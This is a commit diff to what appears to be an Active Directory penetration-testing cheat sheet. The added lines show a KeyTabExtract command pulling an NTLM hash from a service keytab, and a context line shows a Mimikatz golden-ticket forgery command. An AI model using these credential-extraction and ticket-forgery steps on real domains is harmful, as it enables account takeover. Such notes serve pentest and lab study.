Extract User/NTLM from keytab file

Evalle777 · Mar 4, 2022 · d3cd9a2 · d3cd9a2
1 parent 61b0b93
commit d3cd9a2
Showing 1 changed file with 17 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -284,6 +284,23 @@ Invoke-Command -ComputerName UFC-JUMPSRV -Credential $cred -ScriptBlock {
 kerberos::golden /user:Hitman /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:HASH /ticket:tgt /ptt
 ```
 
+&nbsp;
+
+**[+] Extract User/NTLM from keytab file (Linux)**
+
+```bash
+// https://github.com/sosdave/KeyTabExtract
+
+└─# python3 keytabextract.py sql.keytab      
+[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
+[!] Unable to identify any AES256-CTS-HMAC-SHA1 hashes.
+[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
+[+] Keytab File successfully imported.
+        REALM : it.gcb.local
+        SERVICE PRINCIPAL : sqlsvc/
+        NTLM HASH : 7782dXXXXXXXXXXXXXXXXXXX :D
+```
+
 &nbsp;
 &nbsp;